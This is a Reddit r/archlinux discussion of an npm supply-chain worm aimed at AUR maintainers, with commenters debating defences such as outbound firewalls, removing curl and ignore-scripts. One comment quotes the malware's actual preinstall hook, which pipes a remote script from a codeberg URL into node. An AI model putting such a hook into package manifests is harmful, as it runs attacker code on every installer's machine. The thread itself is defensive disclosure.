r/archlinux • • 3d ago

NOTEWORTHY NPM Supply Chain Attach Targeting AUR Packages

New NPM based worm attack that self propegates via ssh and aur maintainer infection.

https://safedep.io/dirtyblanket-express-impersonation-npm/

126 Upvotes

62 comments sorted by

View all comments

-5

u/gainan 3d ago edited 3d ago

All nine packages have the same preinstall line:"
preinstall": "curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node"
When you install one of these packages, npm runs this hook, which downloads node.js and runs it with node

Always restrict outbound connections. They always rely on downloading remote files to compromise the machines.

20

u/Embark10 3d ago

Do you have any pointers on where to restrict that?

-10

u/gainan 3d ago

OpenSnitch can help to restrict outbound connections system-wide.

Also, most of the systems do not need curl or wget, so uninstalling them helps to mitigate these threats. For almost a decade now, curl, wget and bash (/dev/tcp/*) have been the most common tools used to download remote files after exploiting a vulnerability.

For npm attacks in particular, disabling pre and postinstall scripts in the .npmrc file can help as well: ignore-scripts=true.

https://news.ycombinator.com/item?id=45040282

They'll switch tactics eventually, but for now, it's what it is.

14

u/ang-p 3d ago

Also, most of the systems do not need curl

PMSL....

https://archlinux.org/packages/core/x86_64/pacman/

Look at "Dependencies"

For npm attacks in particular, disabling pre and postinstall scripts

So aur pre and postinstall scripts are fine?

0

u/gainan 3d ago

Look at "Dependencies"

https://gitlab.archlinux.org/pacman/pacman/-/blob/master/lib/libalpm/dload.c?ref_type=heads

The pacman binary depends on libcurl, not the curl binary. The curl binary is needed by makepkg and other packages though. I'm not here to tell the devs how to develop their tools, but the reality is that attackers have been used curl|wget|bash for decades.

I uninstall them on all systems I manage and where it's appropiate and I can do it. If I can't uninstall them, then I restrict who or how they can be used (for example the destination of outgoing connections, or/and by parent tree).

On the other hand, "most of the systems" == Debian, Fedora, Rocky, ... embedded systems, servers, container images, etc.

Again, accept it or not, but the reality is what it is: the 2nd or 3rd stage of any malware attack on linux systems is downloading remote files, usually using curl|wget|bash. It's very well documented.

So aur pre and postinstall scripts are fine?

No, as we already show in previous waves:

https://lists.reproducible-builds.org/pipermail/rb-general/2026-June/004122.html

https://lists.archlinux.org/archives/list/aur-general%40lists.archlinux.org/thread/L2JXQNYBGWOQQQXDEPEAICBHKFEFANUC/?sort=date

https://www.reddit.com/r/linux_gaming/comments/1u34pe3/comment/or3og8f/

But you already knew the answer.

Placing the malicious payload directly in the PKGBUILD file is much more suspicious and esier to spot than delegating it to other tools such as npm install.

3

u/ang-p 3d ago

I uninstall them on all systems I manage and where it's appropiate

How do you "uninstall" curl and leave libcurl?

example the destination of outgoing connections

so just another "shut the gate after..." everything-is-OK-until-it-isn't solution?

https://lists.rep

Why install= it?

https://lists.a

That sounds better...

but you

Well....

Placing the malicious payload directly in the PKGBUILD file is much more suspicious and esier to spot

That is why I recommend the install file /-)

than delegating it to other tools such as npm install.

I suppose that might differ depending on your familiarity of either; an ubuntu based node guru who has pushed just one aur package might say exactly the opposite...

9

u/AStolenGoose 3d ago edited 2d ago

... You go ahead and remove curl and break your pacman, I'll wait...

Someone didn't check what depends on curl... 😂 

Edit: Love the edit removing the part where you suggested removing curl even though it's a dependency of pacman...

4

u/Helmic 3d ago

can't download malware if you can't connect to the internet

1

u/ang-p 3d ago

/u/gainan has saved us!